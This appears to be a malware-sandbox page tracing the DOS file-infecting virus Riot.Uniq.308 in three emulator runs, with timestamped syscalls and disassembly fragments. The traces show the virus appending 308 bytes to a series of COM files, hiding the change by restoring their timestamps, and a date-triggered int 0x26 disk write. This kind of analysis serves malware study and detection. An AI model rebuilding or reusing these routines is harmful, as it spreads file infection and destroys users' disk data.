Sample viewer

vx.netlux.org/Virus.DOS.Riot.Uniq.308

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:34.512657651Z 26 PC: 12a84 | Set disk transfer address
2018-12-17T22:50:34.515281582Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.525262995Z 61 PC: 12aca | Open file (Filename = 'c:\dos\doskey.com')
2018-12-17T22:50:34.532303221Z 78 PC: 12a93 | Find first file
2018-12-17T22:50:34.53983897Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.556548359Z 61 PC: 12aca | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:50:34.570976104Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.573303039Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.580761739Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.582479018Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
0x12afb: je 0x12af5
0x12afd: mov word ptr [bp + 0x10d], bx
0x12b01: call 0x22a4f
0x12b04: mov ax, 0x4200
0x12b07: sub cx, cx
0x12b09: cdq
0x12b0a: int 0x21
0x12b0c: mov ah, 0x40
0x12b0e: mov cx, 4
0x12b11: lea dx, word ptr [bp + 0x22c]
0x12b15: int 0x21
0x12b17: pop dx
0x12b18: pop cx
0x12b19: mov ax, 0x5701
0x12b1c: int 0x21
0x12b1e: mov ah, 0x3e
0x12b20: int 0x21
0x12b22: ret
0x12b23: pop bx
2018-12-17T22:50:34.585388477Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.594556604Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.597666114Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.605163404Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.60816016Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.61629137Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.619280234Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.629647985Z 61 PC: 12aca | Open file (Filename = 'PRINT.COM')
2018-12-17T22:50:34.63657181Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.638321606Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.64561238Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.647371732Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
0x12afb: je 0x12af5
0x12afd: mov word ptr [bp + 0x10d], bx
0x12b01: call 0x22a4f
0x12b04: mov ax, 0x4200
0x12b07: sub cx, cx
0x12b09: cdq
0x12b0a: int 0x21
0x12b0c: mov ah, 0x40
0x12b0e: mov cx, 4
0x12b11: lea dx, word ptr [bp + 0x22c]
0x12b15: int 0x21
0x12b17: pop dx
0x12b18: pop cx
0x12b19: mov ax, 0x5701
0x12b1c: int 0x21
0x12b1e: mov ah, 0x3e
0x12b20: int 0x21
0x12b22: ret
0x12b23: pop bx
2018-12-17T22:50:34.64984951Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.653283916Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.654968388Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.657794617Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.663393519Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.671114204Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.67375302Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.682997673Z 61 PC: 12aca | Open file (Filename = 'HELLO.COM')
2018-12-17T22:50:34.687451895Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.688490885Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.693037542Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.694822127Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
0x12afb: je 0x12af5
0x12afd: mov word ptr [bp + 0x10d], bx
0x12b01: call 0x22a4f
0x12b04: mov ax, 0x4200
0x12b07: sub cx, cx
0x12b09: cdq
0x12b0a: int 0x21
0x12b0c: mov ah, 0x40
0x12b0e: mov cx, 4
0x12b11: lea dx, word ptr [bp + 0x22c]
0x12b15: int 0x21
0x12b17: pop dx
0x12b18: pop cx
0x12b19: mov ax, 0x5701
0x12b1c: int 0x21
0x12b1e: mov ah, 0x3e
0x12b20: int 0x21
0x12b22: ret
0x12b23: pop bx
2018-12-17T22:50:34.696523413Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.699100357Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.700302503Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.702116262Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.703417818Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.708252091Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.710112899Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.716773789Z 61 PC: 12aca | Open file (Filename = 'PHANG.COM')
2018-12-17T22:50:34.72826993Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.72981907Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.736507118Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.738487323Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
0x12afb: je 0x12af5
0x12afd: mov word ptr [bp + 0x10d], bx
0x12b01: call 0x22a4f
0x12b04: mov ax, 0x4200
0x12b07: sub cx, cx
0x12b09: cdq
0x12b0a: int 0x21
0x12b0c: mov ah, 0x40
0x12b0e: mov cx, 4
0x12b11: lea dx, word ptr [bp + 0x22c]
0x12b15: int 0x21
0x12b17: pop dx
0x12b18: pop cx
0x12b19: mov ax, 0x5701
0x12b1c: int 0x21
0x12b1e: mov ah, 0x3e
0x12b20: int 0x21
0x12b22: ret
0x12b23: pop bx
2018-12-17T22:50:34.741009621Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.744158809Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.746608021Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.750143651Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.751981369Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.760174401Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.762890958Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.77252415Z 61 PC: 12aca | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:50:34.77976763Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.781402462Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.787500982Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.789118254Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
0x12afb: je 0x12af5
0x12afd: mov word ptr [bp + 0x10d], bx
0x12b01: call 0x22a4f
0x12b04: mov ax, 0x4200
0x12b07: sub cx, cx
0x12b09: cdq
0x12b0a: int 0x21
0x12b0c: mov ah, 0x40
0x12b0e: mov cx, 4
0x12b11: lea dx, word ptr [bp + 0x22c]
0x12b15: int 0x21
0x12b17: pop dx
0x12b18: pop cx
0x12b19: mov ax, 0x5701
0x12b1c: int 0x21
0x12b1e: mov ah, 0x3e
0x12b20: int 0x21
0x12b22: ret
0x12b23: pop bx
2018-12-17T22:50:34.791698836Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.794588593Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.796591975Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.799454487Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.801142097Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.809035407Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.812475583Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.822028682Z 61 PC: 12aca | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:50:34.828638323Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.831193608Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.83732109Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.838670612Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
0x12afb: je 0x12af5
0x12afd: mov word ptr [bp + 0x10d], bx
0x12b01: call 0x22a4f
0x12b04: mov ax, 0x4200
0x12b07: sub cx, cx
0x12b09: cdq
0x12b0a: int 0x21
0x12b0c: mov ah, 0x40
0x12b0e: mov cx, 4
0x12b11: lea dx, word ptr [bp + 0x22c]
0x12b15: int 0x21
0x12b17: pop dx
0x12b18: pop cx
0x12b19: mov ax, 0x5701
0x12b1c: int 0x21
0x12b1e: mov ah, 0x3e
0x12b20: int 0x21
0x12b22: ret
0x12b23: pop bx
2018-12-17T22:50:34.841429336Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.849575289Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.851037485Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.858416669Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.860146337Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.868089783Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.871838599Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.881928478Z 61 PC: 12aca | Open file (Filename = 'PAH.COM')
2018-12-17T22:50:34.888728626Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.891330156Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.897852812Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.899509609Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
0x12afb: je 0x12af5
0x12afd: mov word ptr [bp + 0x10d], bx
0x12b01: call 0x22a4f
0x12b04: mov ax, 0x4200
0x12b07: sub cx, cx
0x12b09: cdq
0x12b0a: int 0x21
0x12b0c: mov ah, 0x40
0x12b0e: mov cx, 4
0x12b11: lea dx, word ptr [bp + 0x22c]
0x12b15: int 0x21
0x12b17: pop dx
0x12b18: pop cx
0x12b19: mov ax, 0x5701
0x12b1c: int 0x21
0x12b1e: mov ah, 0x3e
0x12b20: int 0x21
0x12b22: ret
0x12b23: pop bx
2018-12-17T22:50:34.902782061Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.905854977Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.907327726Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.91070906Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.912368853Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.91975667Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.923520312Z 67 PC: 12ac5 | Get or set file attributes
2018-12-17T22:50:34.933309828Z 61 PC: 12aca | Open file (Filename = 'TEST.COM')
2018-12-17T22:50:34.940052126Z 87 PC: 12ad2 | Get or set file date and time
2018-12-17T22:50:34.943296474Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:50:34.949585615Z 66 PC: 12aee | Move file pointer
2018-12-17T22:50:34.95090108Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
0x12afb: je 0x12af5
0x12afd: mov word ptr [bp + 0x10d], bx
0x12b01: call 0x22a4f
0x12b04: mov ax, 0x4200
0x12b07: sub cx, cx
0x12b09: cdq
0x12b0a: int 0x21
0x12b0c: mov ah, 0x40
0x12b0e: mov cx, 4
0x12b11: lea dx, word ptr [bp + 0x22c]
0x12b15: int 0x21
0x12b17: pop dx
0x12b18: pop cx
0x12b19: mov ax, 0x5701
0x12b1c: int 0x21
0x12b1e: mov ah, 0x3e
0x12b20: int 0x21
0x12b22: ret
0x12b23: pop bx
2018-12-17T22:50:34.954327842Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-17T22:50:34.963157043Z 66 PC: 12b0c | Move file pointer
2018-12-17T22:50:34.964547917Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:50:34.972558722Z 87 PC: 12b1e | Get or set file date and time
2018-12-17T22:50:34.974058196Z 62 PC: 12b22 | Close file
2018-12-17T22:50:34.981618677Z 79 PC: 12a93 | Find next file
2018-12-17T22:50:34.984981558Z 44 PC: 12aa0 | Get time 0x12aa0: cmp dl, 2
0x12aa3: ja 0x12aae
0x12aa5: mov al, 2
0x12aa7: mov cx, 0x4d2
0x12aaa: cdq
0x12aab: int 0x26
0x12aad: popf
0x12aae: mov dx, 0x80
0x12ab1: mov ah, 0x1a
0x12ab3: int 0x21
0x12ab5: mov di, 0x100
0x12ab8: push di
0x12ab9: ret
0x12aba: lea dx, word ptr [bp + 0x252]
0x12abe: mov ax, 0x4301
0x12ac1: xor cx, cx
0x12ac3: int 0x21
0x12ac5: mov ax, 0x3d02
0x12ac8: int 0x21
0x12aca: jb 0x12b22
2018-12-17T22:50:34.987135699Z 26 PC: 12ab5 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":10271,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:37.02407189Z 26 PC: 12a84 | Set disk transfer address
2018-12-25T12:27:37.025678088Z 67 PC: 12ac5 | Get or set file attributes
2018-12-25T12:27:37.03742743Z 61 PC: 12aca | Open file (Filename = 'c:\dos\doskey.com')
2018-12-25T12:27:37.045484293Z 78 PC: 12a93 | Find first file
2018-12-25T12:27:37.052972465Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.071958278Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.078139006Z 87 PC: 12ad2 | Get or set file date and time
2018-12-25T12:27:37.079516996Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:27:37.086743429Z 66 PC: 12aee | Move file pointer
2018-12-25T12:27:37.088368713Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
0x12afb: je 0x12af5
0x12afd: mov word ptr [bp + 0x10d], bx
0x12b01: call 0x22a4f
0x12b04: mov ax, 0x4200
0x12b07: sub cx, cx
0x12b09: cdq
0x12b0a: int 0x21
0x12b0c: mov ah, 0x40
0x12b0e: mov cx, 4
0x12b11: lea dx, word ptr [bp + 0x22c]
0x12b15: int 0x21
0x12b17: pop dx
0x12b18: pop cx
0x12b19: mov ax, 0x5701
0x12b1c: int 0x21
0x12b1e: mov ah, 0x3e
0x12b20: int 0x21
0x12b22: ret
0x12b23: pop bx
2018-12-25T12:27:37.090595671Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-25T12:27:37.09931124Z 66 PC: 12b0c | Move file pointer
2018-12-25T12:27:37.101348535Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:27:37.109846498Z 87 PC: 12b1e | Get or set file date and time
2018-12-25T12:27:37.113095714Z 62 PC: 12b22 | Close file
2018-12-25T12:27:37.122200693Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.12539385Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.137790593Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.145613595Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.147634591Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.156212045Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.158205871Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.161188918Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.164795852Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.167219094Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.170489391Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.173232408Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.182271723Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.185218973Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.19431494Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.201675723Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.203617826Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.211030845Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.214357701Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.217486483Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.221208079Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.224204425Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.228027668Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.230309191Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.239727507Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.244700675Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.256678084Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.267690446Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.27184043Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.276496978Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.277969989Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.280259953Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.282418917Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.283673018Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.287269937Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.291334452Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.297286009Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.300273614Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.312982671Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.323268155Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.325607366Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.33297317Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.335105919Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.338312243Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.342657914Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.344597452Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.347836484Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.350862376Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.359006263Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.362057952Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.373919341Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.38153647Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.383437361Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.392006852Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.394367336Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.397030203Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.40645159Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.409334405Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.417606954Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.419733805Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.429711138Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.432922679Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.443728002Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.452330173Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.454024127Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.461670244Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.464314185Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.466981083Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.470221604Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.472064947Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.475852202Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.477637782Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.486206613Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.490691192Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.502486698Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.510436238Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.513596894Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.51705236Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.519177913Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.523054677Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.533344775Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.535403107Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.543682684Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.546743576Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.556294374Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.559475719Z 44 PC: 12aa0 | Get time 0x12aa0: cmp dl, 2
0x12aa3: ja 0x12aae
0x12aa5: mov al, 2
0x12aa7: mov cx, 0x4d2
0x12aaa: cdq
0x12aab: int 0x26
0x12aad: popf
0x12aae: mov dx, 0x80
0x12ab1: mov ah, 0x1a
0x12ab3: int 0x21
0x12ab5: mov di, 0x100
0x12ab8: push di
0x12ab9: ret
0x12aba: lea dx, word ptr [bp + 0x252]
0x12abe: mov ax, 0x4301
0x12ac1: xor cx, cx
0x12ac3: int 0x21
0x12ac5: mov ax, 0x3d02
0x12ac8: int 0x21
0x12aca: jb 0x12b22
2018-12-25T12:27:37.563257015Z 26 PC: 12ab5 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":10271,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:37.267301229Z 26 PC: 12a84 | Set disk transfer address
2018-12-25T12:27:37.268932678Z 67 PC: 12ac5 | Get or set file attributes
2018-12-25T12:27:37.280295898Z 61 PC: 12aca | Open file (Filename = 'c:\dos\doskey.com')
2018-12-25T12:27:37.288181137Z 78 PC: 12a93 | Find first file
2018-12-25T12:27:37.295268585Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.314655536Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.323348293Z 87 PC: 12ad2 | Get or set file date and time
2018-12-25T12:27:37.325391204Z 63 PC: 12adf | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:27:37.33375958Z 66 PC: 12aee | Move file pointer
2018-12-25T12:27:37.335764898Z 44 PC: 12af9 | Get time 0x12af9: add dl, dh
0x12afb: je 0x12af5
0x12afd: mov word ptr [bp + 0x10d], bx
0x12b01: call 0x22a4f
0x12b04: mov ax, 0x4200
0x12b07: sub cx, cx
0x12b09: cdq
0x12b0a: int 0x21
0x12b0c: mov ah, 0x40
0x12b0e: mov cx, 4
0x12b11: lea dx, word ptr [bp + 0x22c]
0x12b15: int 0x21
0x12b17: pop dx
0x12b18: pop cx
0x12b19: mov ax, 0x5701
0x12b1c: int 0x21
0x12b1e: mov ah, 0x3e
0x12b20: int 0x21
0x12b22: ret
0x12b23: pop bx
2018-12-25T12:27:37.338741522Z 64 PC: 12a5d | Write file or device (Write 308 bytes on handle 5)
2018-12-25T12:27:37.351574052Z 66 PC: 12b0c | Move file pointer
2018-12-25T12:27:37.353610558Z 64 PC: 12b17 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:27:37.36148455Z 87 PC: 12b1e | Get or set file date and time
2018-12-25T12:27:37.36444105Z 62 PC: 12b22 | Close file
2018-12-25T12:27:37.373596359Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.376558709Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.388670063Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.396925518Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.398527167Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.405646371Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.40752085Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.410234944Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.413762398Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.416317886Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.419618914Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.421593407Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.432647118Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.4368519Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.448008946Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.457532529Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.459661673Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.466638003Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.468584841Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.472107137Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.476325458Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.478922138Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.482391243Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.485175843Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.493604331Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.496765479Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.508295074Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.515673716Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.51749151Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.525649528Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.527612015Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.530505519Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.534488125Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.53640863Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.539625077Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.542778976Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.551471128Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.554758884Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.566664931Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.57472196Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.576906307Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.584660594Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.589033918Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.59211914Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.596587856Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.598941888Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.602027226Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.603953599Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.612893107Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.616270838Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.627092888Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.635345918Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.637205545Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.644521794Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.64677564Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.649467119Z 64 PC: 12a5d | Write file or device (See above)
